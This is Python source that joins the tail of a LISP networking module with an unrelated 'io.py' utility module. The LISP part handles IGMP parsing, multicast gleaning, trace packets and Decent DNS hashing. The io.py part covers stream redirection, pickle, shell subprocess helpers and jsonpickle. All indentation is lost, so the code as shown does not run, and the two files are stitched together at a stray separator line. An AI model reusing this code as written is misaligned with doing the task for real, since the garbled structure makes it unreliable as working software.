#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x.q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endif
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# Supplied source and group are addresses passed as strings. Build in internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display port if in this call is a encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed + "-ts"
entry[key] = lisp_get_timestamp()
#
# If this is a ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Add recent-rtts and recent-hops.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for record. If we appending the first ITR node entry, get its
# RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swampping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mapping array to see if we should glean the EID and
# RLOC. Find first match. Return False if there are no configured glean
# mappings. The second return value is either True or False depending if the
# matched entry was configured to RLOC-probe the RLOC for the gleaned entry.
#
def lisp_allow_gleaning(eid, group, rloc):
if (lisp_glean_mappings == []): return(False, False)
for entry in lisp_glean_mappings:
if (entry.has_key("instance-id")):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if (entry.has_key("eid-prefix")):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if (entry.has_key("group-prefix")):
if (group == None): continue
g = copy.deepcopy(entry["group-prefix"])
g.instance_id = group.instance_id
if (group.is_more_specific(g) == False): continue
#endif
if (entry.has_key("rloc-prefix")):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"])
#endfor
return(False, False)
#enddef
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port):
e = green("(*, {})".format(geid.print_address()), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None):
mc = lisp_mapping("", "", [])
mc.group.copy_address(geid)
mc.eid.copy_address(geid)
mc.eid.address = 0
mc.eid.mask_len = 0
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_IGMP_TTL
mc.gleaned = True
mc.add_cache()
lprint("Add gleaned EID {} to map-cache".format(e))
#endif
seid_name = seid.print_address_no_iid()
#
# Check to see if RLE node exists. If so, update the RLE node RLOC and
# encap-port.
#
rloc_entry = rle_entry = rle_node = None
if (mc.rloc_set != []):
rloc_entry = mc.rloc_set[0]
if (rloc_entry.rle):
rle_entry = rloc_entry.rle
for rn in rle_entry.rle_nodes:
if (rn.rloc_name != seid_name): continue
rle_node = rn
break
#endfor
#endif
#endif
#
# Adding RLE to existing rloc-set or create new one.
#
if (rloc_entry == None):
rloc_entry = lisp_rloc()
mc.rloc_set = [rloc_entry]
rloc_entry.priority = 253
rloc_entry.mpriority = 255
mc.build_best_rloc_set()
#endif
if (rle_entry == None):
rle_entry = lisp_rle(geid.print_address())
rloc_entry.rle = rle_entry
#endif
if (rle_node == None):
rle_node = lisp_rle_node()
rle_node.rloc_name = seid_name
rle_entry.rle_nodes.append(rle_node)
rle_entry.build_forwarding_list()
lprint("Add RLE {} for gleaned EID {}".format(r, e))
elif (rloc.is_exact_match(rle_node.address) == False or
port != rle_node.translated_port):
lprint("Changed RLE {} for gleaned EID {}".format(r, e))
#endif
#
# Add or update.
#
rle_node.store_translated_rloc(rloc, port)
#enddef
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid, rloc, port):
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None): return
rle = mc.rloc_set[0].rle
if (rle == None): return
rloc_name = seid.print_address_no_iid()
found = False
for rle_node in rle.rle_nodes:
if (rle_node.rloc_name == rloc_name):
found = True
break
#endif
#endfor
if (found == False): return
#
# Found entry to remove.
#
rle.rle_nodes.remove(rle_node)
rle.build_forwarding_list()
e = green("(*, {})".format(geid.print_address()), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
lprint("Gleaned EID {} RLE {} removed".format(e, r))
#
# Remove map-cache entry if no more RLEs present.
#
if (rle.rle_nodes == []):
mc.delete_cache()
lprint("Gleaned EID {} removed, no more RLEs".format(e, r))
#endif
#enddef
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Basically odd types are Joins and even types are Leaves.
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
r = bold("Receive", False)
lprint("{} {}-byte IGMP packet: {}".format(r, len(packet),
lisp_format_packet(packet)))
#
# Jump over IP header.
#
header_offset = (struct.unpack("B", packet[0])[0] & 0x0f) * 4
#
# Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
#
igmp = packet[header_offset::]
igmp_type = struct.unpack("B", igmp[0])[0]
group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
if (reports_and_leaves_only == False):
igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
igmp_types.has_key(igmp_type) else igmp_type
lprint("IGMP type {} not supported".format(igmp_str))
return([])
#endif
if (len(igmp) < 8):
lprint("IGMP message too small")
return([])
#endif
#
# Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
# IGMPv3, we will fix up group address in loop (for each group record).
#
group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
group_str = group.print_address_no_iid()
#
# Process either IGMPv1 or IGMPv2 and exit.
#
if (igmp_type == 0x17):
lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
return([[None, group_str, False]])
#endif
if (igmp_type in (0x12, 0x16)):
lprint("IGMPv{} join (*, {})".format( \
1 if (igmp_type == 0x12) else 2, bold(group_str, False)))
#
# Suppress for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
else:
return([[None, group_str, True]])
#endif
#
# Finished with IGMPv1 or IGMPv2 processing.
#
return([])
#endif
#
# Parse each record for IGMPv3 (igmp_type == 0x22).
#
record_count = group.address
igmp = igmp[8::]
group_format = "BBHI"
group_size = struct.calcsize(group_format)
source_format = "I"
source_size = struct.calcsize(source_format)
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
#
# Traverse each group record.
#
register_entries = []
for i in range(record_count):
if (len(igmp) < group_size): return
record_type, x, source_count, address = struct.unpack(group_format,
igmp[:group_size])
igmp = igmp[group_size::]
if (lisp_igmp_record_types.has_key(record_type) == False):
lprint("Invalid record type {}".format(record_type))
continue
#endif
record_type_str = lisp_igmp_record_types[record_type]
source_count = socket.ntohs(source_count)
group.address = socket.ntohl(address)
group_str = group.print_address_no_iid()
lprint("Record type: {}, group: {}, source-count: {}".format( \
record_type_str, group_str, source_count))
#
# Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
# MODE_TO_EXCLUDE (4) with no sources is a join. CHANGE_TO_INCLUDE (5)
# is a join. Everything else is a leave.
#
joinleave = False
if (record_type in (1, 5)): joinleave = True
if (record_type == 4 and source_count == 0): joinleave = True
j_or_l = "join" if (joinleave) else "leave"
#
# Suppress registration for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
continue
#endif
#
# (*,G) Join or Leave has been received if source count is 0.
#
# If this is IGMPv2 or just IGMPv3 reporting a group address, encode
# a (*,G) for the element in the register_entries array.
#
if (source_count == 0):
register_entries.append([None, group_str, joinleave])
lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
bold(group_str, False)))
#endif
#
# Process (S,G)s (source records)..
#
for j in range(source_count):
if (len(igmp) < source_size): return
address = struct.unpack(source_format, igmp[:source_size])[0]
source.address = socket.ntohl(address)
source_str = source.print_address_no_iid()
register_entries.append([source_str, group_str, joinleave])
lprint("{} ({}, {})".format(j_or_l,
green(source_str, False), bold(group_str, False)))
igmp = igmp[source_size::]
#endfor
#endfor
#
# Return (S,G) entries to return to call to send a Map-Register.
# They are put in a multicast Info LCAF Type with ourselves as an RLE.
# This is spec'ed in RFC 8378.
#
return(register_entries)
#enddef
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache. This function will do
# this for the source EID of a packet and IGMP reported groups with one call.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
rloc_change = True
mc = lisp_map_cache.lookup_cache(seid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
orloc = cached_rloc.rloc
oport = cached_rloc.translated_port
rloc_change = (orloc.is_exact_match(rloc) == False or
oport != encap_port)
if (rloc_change):
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Change gleaned EID {} to RLOC {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
#
# Change RLOC for each gleaned group this EID has joined.
#
for group in mc.gleaned_groups:
lisp_geid.store_address(group)
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port)
#endfor
#endif
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(seid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Adding RLOC to new map-cache entry or updating RLOC for existing entry..
#
if (rloc_change):
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#endif
#
# Unicast gleaning only.
#
if (igmp == None): return
#
# Process IGMP report. For each group, put in map-cache with gleaned
# source RLOC and source port.
#
lisp_geid.instance_id = seid.instance_id
#
# Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
# The lisp-etr process will do this.
#
entries = lisp_process_igmp_packet(igmp)
for source, group, joinleave in entries:
if (source != None): continue
#
# Does policy allow gleaning for this joined multicast group.
#
lisp_geid.store_address(group)
allow, nil = lisp_allow_gleaning(seid, lisp_geid, rloc)
if (allow == False): continue
if (joinleave):
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port)
if (group in mc.gleaned_groups): continue
mc.gleaned_groups.append(group)
else:
lisp_remove_gleaned_multicast(seid, lisp_geid, rloc, encap_port)
if (group in mc.gleaned_groups): mc.gleaned_groups.remove(group)
#endif
#endfor
#enddef
#------------------------------------------------------------------------------
|
io.py | import pickle as pickle
import codecs
import contextlib
from contextlib import contextmanager
import gzip
import json
import os
import random
import shutil
import subprocess
import sys
import time
from queue import Queue, Empty
from abc import ABCMeta, abstractmethod
from collections import Mapping, OrderedDict
from os.path import join
from threading import Thread
import jsonpickle
import numpy as np
from fabric.api import local, settings
from fabric.context_managers import hide
from gtd.utils import truncated
class MultiStream(object):
def __init__(self, *streams):
self.streams = streams
def write(self, msg):
for s in self.streams:
s.write(msg)
s.flush()
def flush(self):
for s in self.streams:
s.flush()
class redirect_stream(object):
"""Inside this context manager, inputs to a target stream are redirected to a replacement stream instead."""
def __init__(self, replacement):
"""Redirect.
Args:
replacement: replace the target stream with this stream.
"""
self._replacement = replacement
@property
def target_stream(self):
"""Get the target stream."""
raise NotImplementedError
@target_stream.setter
def target_stream(self, s):
"""Set the target stream."""
raise NotImplementedError
def __enter__(self):
self._original = self.target_stream # save the original stream
self.target_stream = self._replacement
def __exit__(self, exc_type, exc_value, traceback):
self._replacement.flush()
self.target_stream = self._original # put the original stream back
class redirect_stdout(redirect_stream):
@property
def target_stream(self):
return sys.stdout
@target_stream.setter
def target_stream(self, s):
sys.stdout = s
class redirect_stderr(redirect_stream):
@property
def target_stream(self):
return sys.stderr
@target_stream.setter
def target_stream(self, s):
sys.stderr = s
class save_stdout(object):
def __init__(self, save_dir):
makedirs(save_dir)
save_file = lambda filename: open(join(save_dir, filename), 'a')
self._f_out = save_file('stdout.txt')
self._f_err = save_file('stderr.txt')
self._redirects = [redirect_stdout(MultiStream(self._f_out, sys.stdout)),
redirect_stderr(MultiStream(self._f_err, sys.stderr))]
def __enter__(self):
for r in self._redirects:
r.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
for r in self._redirects:
r.__exit__(exc_type, exc_val, exc_tb)
self._f_out.close()
self._f_err.close()
def utfopen(path, mode):
"""Open a file with UTF-8 encoding."""
return codecs.open(path, mode, encoding='utf-8')
def save(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f)
def load(path):
with open(path, 'rb') as f:
return pickle.load(f)
def work_in_sandbox(directory):
"""Create a sandbox directory, and set cwd to sandbox.
Deletes any existing sandbox directory!
Args:
directory: directory in which to put sandbox directory
"""
os.chdir(directory)
p = 'sandbox'
if os.path.exists(p): # remove if already exists
shutil.rmtree(p)
os.makedirs(p)
os.chdir(p)
print(os.getcwd())
def makedirs(directory):
"""If directory does not exist, make it.
Args:
directory (str): a path to a directory. Cannot be the empty path.
"""
if directory != '' and not os.path.exists(directory):
os.makedirs(directory)
def reset_state():
# Reset all random seeds, as well as TensorFlow default graph
random.seed(0)
np.random.seed(0)
import tensorflow as tf
from tensorflow.python.framework import ops
tf.set_random_seed(0)
ops.reset_default_graph()
class EmptyFile(object):
"""Delivers a never-ending stream of empty strings."""
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def __iter__(self):
return self
def __next__(self):
return ''
def read_files(*file_paths):
files = []
for i, p in enumerate(file_paths):
if p:
files.append(open(p, mode="r"))
print('Opened:', p)
else:
files.append(EmptyFile())
print('WARNING: no path provided for file {} in list.'.format(i))
with contextlib.nested(*files) as entered_files:
for lines in zip(*entered_files):
yield lines
class MultiFileWriter(object):
def __init__(self, *file_paths):
self.file_paths = file_paths
def __enter__(self):
self.files = [open(fp, 'w') for fp in self.file_paths]
return self
def __exit__(self, exc_type, exc_val, exc_tb):
for file in self.files:
file.__exit__(exc_type, exc_val, exc_tb)
def write(self, lines):
assert len(lines) == len(self.files)
for f, line in zip(self.files, lines):
f.write(line)
def open_or_create(path, *args, **kwargs):
"""Open a file or create it, if it does not exist.
Args:
path (str): path to file
gz (bool): whether to use GZIP or not. Defaults to False.
Returns:
file object
"""
gz = kwargs.pop('gz', False)
open_file = gzip.open if gz else open
if not os.path.isfile(path):
with open_file(path, 'w'):
pass # create file
return open_file(path, *args, **kwargs)
class Process(object):
def __init__(self, cmd, cwd=None):
self._proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, cwd=cwd)
def read(self, timeout=float('inf')):
def enqueue_output(out, queue):
for c in iter(lambda: out.read(1), ''):
queue.put(c)
q = Queue()
t = Thread(target=enqueue_output, args=(self._proc.stdout, q))
t.daemon = True # thread dies with the program
t.start()
last_yield_time = time.time()
while True:
try:
yield q.get(timeout=0.001)
last_yield_time = time.time()
except Empty:
# if 1 millisecond passes without new item on queue...
if not self.alive:
# break if process has died
break
if time.time() - last_yield_time > timeout:
# break if time is up
break
def read_lines(self, timeout=float('inf')):
chars = []
for c in self.read(timeout):
chars.append(c)
if c == '\n':
yield ''.join(chars[:-1])
chars = []
@property
def pid(self):
return self._proc.pid
@property
def alive(self):
code = self._proc.poll()
return code is None
def terminate(self):
return self._proc.terminate()
def wait(self):
return self._proc.wait()
def shell(cmd, cwd=None, verbose=False, debug=False):
"""Execute a command just like you would at the command line.
Attempts to print output from the command with as little buffering as possible.
http://stackoverflow.com/questions/18421757/live-output-from-subprocess-command
Args:
cmd (str): command to execute, just as you would enter at the command line
cwd (str): current working directory to execute the command
verbose (bool): whether to print out the results of the command
debug (bool): if True, command is not actually executed. Typically used with verbose=True.
Returns:
all output from the command
"""
if verbose:
print(cmd)
if debug:
return
output = []
process = Process(cmd, cwd)
for c in process.read():
output.append(c)
if verbose:
sys.stdout.write(c)
sys.stdout.flush()
status = process.wait()
if status != 0:
raise RuntimeError('Error, exit code: {}'.format(status))
# TODO: make sure we get all output
return ''.join(output)
def local_bash(command, capture=False):
"""Just like fabric.api.local, but with shell='/bin/bash'."""
return local(command, capture, shell='/bin/bash')
class JSONPicklable(object, metaclass=ABCMeta):
"""Uses jsonpickle to convert any picklable object to and from JSON."""
@abstractmethod
def __getstate__(self):
"""Return a variable with enough information to reconstruct the object."""
pass
@abstractmethod
def __setstate__(self, state):
"""Use the variable from __getstate__ to restore the object.
Note that pickle created this object without calling __init__.
So, a common strategy is to manually call self.__init__(...) inside this function, using the information
provided by `state`.
"""
pass
def to_json_str(self):
return jsonpickle.encode(self)
@classmethod
def from_json_str(self, s):
return jsonpickle.decode(s)
def to_json(self):
"""Use jsonpickle to convert this object to JSON."""
s = self.to_json_str()
d = json.loads(s) # convert str to dict
return d
@classmethod
def from_json(cls, d):
"""Use jsonpickle to convert JSON into an object."""
s = json.dumps(d)
obj = cls.from_json_str(s)
return obj
def to_file(self, path):
with open(path, 'w') as f:
json.dump(self.to_json(), f)
